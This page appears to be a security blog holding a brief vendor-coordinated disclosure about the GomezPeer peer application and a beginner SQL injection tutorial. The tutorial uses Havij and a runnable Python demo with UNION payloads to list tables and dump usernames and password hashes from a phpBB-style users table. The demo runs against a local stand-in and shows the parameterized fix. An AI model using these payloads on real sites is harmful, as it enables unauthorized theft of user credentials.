Gomez Peer Exploit

Introduction:

I decided to take a look at how GomezPeer works from a low-level view. During my observations I was surprised at how easily someone could grab usernames and login info from corporate websites, passively, while running the application.

What is GomezPeer: (in brief)

For those of you who don’t know, GomezPeer is a public peer application that Dynatrace runs in order to test website responsiveness. Dynatrace claims to be #1 in application performance management.

GomezPeer pays clients to run the application and its instruction sets on their own PCs so that vendors can measure end-user performance of their sites. Examples include logging in and ordering plane tickets, or executing database queries against a server to see how long the data takes to come back from different areas of the country or world. This lets them test a large number of OSs, ISPs and locations without paying for that infrastructure themselves. Peers are compensated between $5 and $40 per month and can choose to donate the amount to charity. Over the last few months GomezPeer has been slowly rebranding its application as Dynatrace. Both GomezPeer and Dynatrace are owned by Compuware.

Both GomezPeer and Dynatrace use the same address block:

Gomez Advisor PNAP-BSN-GOMEZ-RM-02 (NET-63-251-134-0-1) 63.251.134.0 – 63.251.134.255

How GomezPeer works:
GomezPeer is installed on a client and then activated by entering a username that corresponds to a GomezPeerZone account. You can install as many peers as you like, on as many physical hosts as you like, in order to increase your earnings.

The Exploit:

The original documentation on it has been pulled at the request of the vendor.

After working with the vendor, the exploit has been mitigated and GomezPeer has been hardened to be more resilient to such attacks. The Dynatrace team was very quick to respond to the issue and to let the affected clients know.

I also found the project managers at Dynatrace easy to communicate with while working out the specifics, and I thank them for that.

SQL Injection Basics | How I learned that point-and-click attacks are easy.

After watching Troy Hunt’s YOW! conference talk I was inspired to try the great SQL injection. This technique is known for pulling mass password lists / email addresses from forum sites. This is a two-part guide, and this is the first part. Part two covers what to do with the data once you have it.

Disclaimer – Tests were conducted internally, as far as you need to believe, and by reading past this line you release me from any liability regarding your use of the tools and the information provided below. Consider this your very vintage reminder that 14-year-olds go to jail every year for doing this kind of shit.

Question: Can I use SQL injection to get usernames and passwords?
How can I test for SQL injection?
What is a good app for those who don’t understand what SQL is or how injection works?
What is SQL injection?

Answer: Yes, you can get usernames and passwords in plaintext (if the site stores them that badly), hashed, and hashed-and-salted varieties.
There are many paid tools for testing SQL injection that are better than the free one demoed here, but you can’t beat free.
We are going to use Havij 1.15 to test for SQL injection.
In brief, SQL injection is when input from an incoming request is not sanitized (or bound as a parameter) before it is concatenated into a database query, which lets someone insert their own question (query) that the database answers before the data is sent back to the user.

Here is your super basic breakdown of SQL injection. A user goes to the site they want to try to inject. They look for some element on the page that is backed by SQL (logins, PHP forms tied to DBs, forums, comments, etc.). Once they find that element they pass erroneous data to it and see how it responds. If the page shows an error that looks like a SQL error, or a table of data, you have likely scored: the database is telling you about the problem, which is something it should never do for an end user. (The absence of an error does not prove the parameter is safe; blind injection exists, but that is beyond this post.) So let’s get to this!

First locate the internal site you are allowed to test, which I’m sure you’re all here to read and learn about. Here is mine, straight from the 1990s. I see there is a comments section with my appropriate string:

www.site.com/comments.php?id=4

Perfect, now we need to test it. Let’s add a simple ' to the end of it and try again.

Perfect, the page handed us a SQL error for our modified GET parameter, which means the quote reached the query unescaped. So let’s take our new string

http://mysite.com/comments.php?id=4'

and throw it into Havij. This app gives us a logical view of the DB, including a tree view of the tables and columns; in other words, it shows what can be read through the injection point. Havij comes in two flavors, Free and Pro, and can be readily found on Google. I will not be linking it from this article as there is no official source repo.

Then click Analyze and it will attempt to fingerprint the database and interface with it. The log console shows you any information you need. If it just keeps running iterations, it has probably failed or the parameter cannot be injected. Check the status field; in my case it reports a successful injection.

Now click Tables, then Get DBs, to list all the databases readable on the server.

OK, so there are three levels of data we can query:

Databases – the root folders you see here. There is usually one per service, used to logically sort data; think of a folder called \music\ .
Tables – the first subfolder. They sort the data within the database, much like \music\techno\, and each one holds a fixed set of columns (user accounts, privileges, group settings and so on).
Columns – the fields inside a table, such as post dates / times, IDs, GUIDs, usernames and passwords. Each row of the table holds one record’s values for those columns, the way \music\techno\Gemini – Blue is one file inside its folder.

When using Havij you work top-down: let it find all the databases first, then pick one database and Get Tables until you see the table you want to Get Columns from.

Here is an example of a few tables from a phpBB database, found using Get Tables.

phpbb_users
phpbb_privmsgs
phpbb_topics

I am going to use phpbb_users as my example table to Get Columns from. Tick the checkbox for that single table and choose Get Columns.

New data will be populated and you will see it as another subcategory. Select the data you want; it’s best to choose just a few columns at first. Column names are unique to each application, and this example is specific to phpBB. For the example I chose:

user_id – a number tied to the user; it gives us an idea of the size of the user base
username – the login
user_email – the account registrant’s address
user_password – their hashed and salted password
user_form_salt – some kind of initial salt for logins or account creation; not sure

There are various other columns, like user_ip, that would have been interesting as well.
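As an added example (this is not code from the post, and it is not Havij’s code), here is the whole procedure above compressed into one runnable script: the ' probe against comments.php?id=4, the catalog walk that Get Tables does for you, and the phpbb_users column grab, all run against a constructed in-memory SQLite stand-in for the target (the comments and phpbb_users tables are seeded with made-up rows and sample hashes), followed by the parameterized version of the same lookup, which stops all three. The table and column names follow the post; the helper names and the sample data are my assumptions. SQLite keeps its catalog in sqlite_master where MySQL uses information_schema, so the enumeration payload differs by engine but the idea is the same.

```python
import sqlite3

# Constructed stand-in for the target in the post: an in-memory SQLite DB with
# the comments table behind comments.php?id=N and a phpBB-style users table.
# Hashes, emails and salts below are made-up sample data, not real records.
SEED_SQL = """
CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT);
INSERT INTO comments VALUES (4, 'admin', 'First post, straight from the 1990s');
CREATE TABLE phpbb_users (user_id INTEGER PRIMARY KEY, username TEXT,
    user_email TEXT, user_password TEXT, user_form_salt TEXT);
INSERT INTO phpbb_users VALUES
    (2, 'admin', 'admin@site.com', '$H$9sampleHashAdmin000000000', 'f00dfeed'),
    (3, 'bob',   'bob@site.com',   '$H$9sampleHashBob00000000000', 'deadbeef');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def comments_vulnerable(conn, id_param):
    # The bug the post relies on: the raw GET value is pasted into the SQL text,
    # so whatever follows the number becomes part of the query.
    sql = "SELECT author, body FROM comments WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def comments_hardened(conn, id_param):
    # The fix: the value is bound as a parameter and is never parsed as SQL.
    sql = "SELECT author, body FROM comments WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def probe(conn, fetch, id_param):
    """The manual test from the post: return ('error', msg) when the database
    chokes on the input (the tell-tale SQL error), else ('rows', rows)."""
    try:
        return ("rows", fetch(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def enumerate_tables(conn, fetch):
    """What Havij's Get Tables does: ride a UNION into the catalog. A negative id
    makes the legitimate half of the query return nothing, so only our rows come
    back; the UNION must supply as many columns as the original SELECT (two)."""
    payload = "-1 UNION SELECT name, sql FROM sqlite_master WHERE type = 'table'"
    return sorted(name for name, _ in fetch(conn, payload))


def dump_users(conn, fetch):
    """What Get Columns plus the data grab does for phpbb_users: pull the login
    and the (hashed, salted) password column through the same injection point."""
    payload = "-1 UNION SELECT username, user_password FROM phpbb_users"
    return dict(fetch(conn, payload))


if __name__ == "__main__":
    db = make_db()
    for name, fetch in (("vulnerable", comments_vulnerable),
                        ("hardened", comments_hardened)):
        print(f"== {name} comments.php ==")
        print("id=4  ->", probe(db, fetch, "4"))
        print("id=4' ->", probe(db, fetch, "4'"))
        print("tables ->", enumerate_tables(db, fetch))
        print("users  ->", dump_users(db, fetch))
```

Run it and the vulnerable path shows the three stages in order: id=4' produces an "unrecognized token" error (the signal the post tells you to look for), the UNION lists comments and phpbb_users, and the final payload returns the admin and bob hashes. The hardened path answers id=4 normally, returns an empty result for id=4' instead of an error, and returns nothing for both payloads, because the bound value is compared as data and never parsed as SQL.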

But wait, I thought you said I could get some passwords from this! Well, grasshopper, we need to establish the fact that nobody should be storing passwords in cleartext on the server; this is bad practice, and phpBB does not do it. What we have are salted hashes, and I’m going to explain how to crack them in the next post. For now, let’s save this using the Save Data button and make sure it’s an easy-to-read HTML file.

Congratulations, you are just as badass as those 14-year-olds out there running amok on the internet. But you’re one step closer to understanding how this attack works and what could happen in the event you have a leak of your DB.

I would just like to point out that this is a very basic representation of how to do this. The software is doing all the heavy lifting; if you want to look into programming and testing for such a thing, I would recommend taking a course on SQL and reviewing the queries in the console output of Havij (Persian for ‘carrot’).

Now that you have learned the basics, it’s time to grab a copy of sqlmap and learn how to do it the proper way. Havij is really just an easy way to test out a site.